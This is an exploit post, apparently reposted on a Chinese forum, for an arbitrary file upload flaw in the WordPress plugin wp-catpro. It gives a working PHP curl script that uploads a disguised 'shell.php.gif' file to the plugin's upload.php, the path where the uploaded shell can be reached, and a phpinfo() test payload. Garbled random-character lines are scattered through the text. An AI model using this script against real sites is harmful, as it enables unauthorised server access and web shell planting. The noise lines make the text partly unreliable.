WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
9 M, J% v) q2 I/ L: {9 T#-----------------------------------------------------------------------

作者  => Zikou-16
8 y# }1 V4 ^8 j0 \% O( [邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
* i' X6 ?' B0 [. |- t# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
5 U/ D. Z* u0 }0 S+ J. I  X# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
/ g. T4 z! X! m* o) g# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
( G; ]" `: c: I. q* [------------------
' B* Q; ^) o" ~/ W$ y- H. S+ g
#=> Exploit
2 g" T6 i; z$ ?) c-----------
<?php
  N3 G* S3 K  F
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
: x4 X! \# i) z$ dcurl_close($ch);

print "$postResult";
% A6 ~) p9 a3 }+ E: m
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
3 g0 R$ M2 ^# c( c+ fphpinfo();
) A6 p2 v. \3 Q! B5 n, R; ]?>